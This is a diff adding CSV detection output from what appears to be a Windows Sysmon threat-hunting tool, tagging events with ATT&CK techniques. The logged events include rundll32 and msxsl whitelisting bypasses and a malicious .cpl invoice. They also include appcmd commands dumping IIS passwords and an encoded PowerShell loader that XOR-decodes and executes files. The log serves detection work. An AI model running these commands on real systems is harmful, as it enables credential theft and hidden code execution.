+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16391
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:33:37.063
+ 365ABB72-20B1-5CD8-0000-001064D62400
+ 1844
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5943
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.933
+ 365ABB72-3D6E-5CEB-0000-0010EFADFF00
+ 2276
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6184
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:48.644
+ 365ABB72-FE70-5CEB-0000-0010385C0C00
+ 2412
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4908
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-29 21:33:19.687
+ 747F3D96-661E-5D3F-0000-00107F248700
+ 3164
+ C:\Windows\System32\mshta.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49827
+
+ false
+ 93.184.220.29
+
+ 80
+ http
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:17.445
+ 747F3D96-60F5-5D3F-0000-0010D1CF5500
+ 4356
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+ C:\Users\IEUser\Downloads\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-60F5-5D3F-0000-0010A7B65500
+ 4996
+ C:\Windows\System32\control.exe
+ "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1017
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-23 17:26:08.686
+ 365ABB72-D7B0-5CE6-0000-001077C56D00
+ 3388
+ \\vboxsrv\HTools\msxsl.exe
+ 1.1.0.1
+ msxsl
+ Command Line XSLT
+ Microsoft
+ msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat
+ D:\
+ IEWIN7\IEUser
+ 365ABB72-CE6C-5CE6-0000-002047F30000
+ 0xf347
+ 1
+ High
+ SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8
+ 365ABB72-D2D4-5CE6-0000-001047EA6400
+ 2236
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 380456
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ -
+ 2020-09-10 17:48:39.678
+ 747F3D96-66F7-5F5A-0500-00000000F600
+ 388
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ c:\windows\system32\cmd.exe
+ c:\windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-66F8-5F5A-E703-000000000000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-66F4-5F5A-0300-00000000F600
+ 300
+ C:\Windows\System32\smss.exe
+ \SystemRoot\System32\smss.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:17.445
+ 747F3D96-60F5-5D3F-0000-0010D1CF5500
+ 4356
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+ C:\Users\IEUser\Downloads\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-60F5-5D3F-0000-0010A7B65500
+ 4996
+ C:\Windows\System32\control.exe
+ "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:17.445
+ 747F3D96-60F5-5D3F-0000-0010D1CF5500
+ 4356
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+ C:\Users\IEUser\Downloads\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-60F5-5D3F-0000-0010A7B65500
+ 4996
+ C:\Windows\System32\control.exe
+ "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16511
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:20:01.964
+ 365ABB72-55C1-5CD8-0000-0010970D2F00
+ 4092
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-502E-5CD8-0000-00102A330700
+ 3192
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16390
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:32:58.167
+ 365ABB72-208A-5CD8-0000-0010119B2400
+ 3560
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16390
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:32:58.167
+ 365ABB72-208A-5CD8-0000-0010119B2400
+ 3560
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5940
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.852
+ 365ABB72-3D6E-5CEB-0000-00102FAAFF00
+ 3304
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
